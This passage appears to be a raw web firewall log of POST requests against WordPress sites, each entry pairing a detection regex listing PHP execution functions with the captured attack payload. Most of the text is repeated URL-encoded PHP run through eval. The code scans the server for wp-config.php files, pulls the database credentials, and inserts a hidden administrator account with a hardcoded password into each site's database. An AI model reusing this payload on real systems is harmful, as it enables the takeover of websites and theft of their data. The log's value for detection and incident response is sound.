27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 00:10:26","213.209.159.254","POST","\/wp-includes\/Text\/xlesjbk\/kwoqreg\/wvnqbrx\/filelist.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> mInwNQ:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/Text\/xlesjbk\/kwoqreg\/wvnqbrx\/filelist.php HTTP\/1.1\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-dest:document\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.0 Safari\/605.1.15\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\ncontent-length:12663\nsec-fetch-site:none\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-mode:navigate\n\nmInwNQ=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 00:11:14","213.209.159.254","POST","\/wp-includes\/feed.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> gR:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5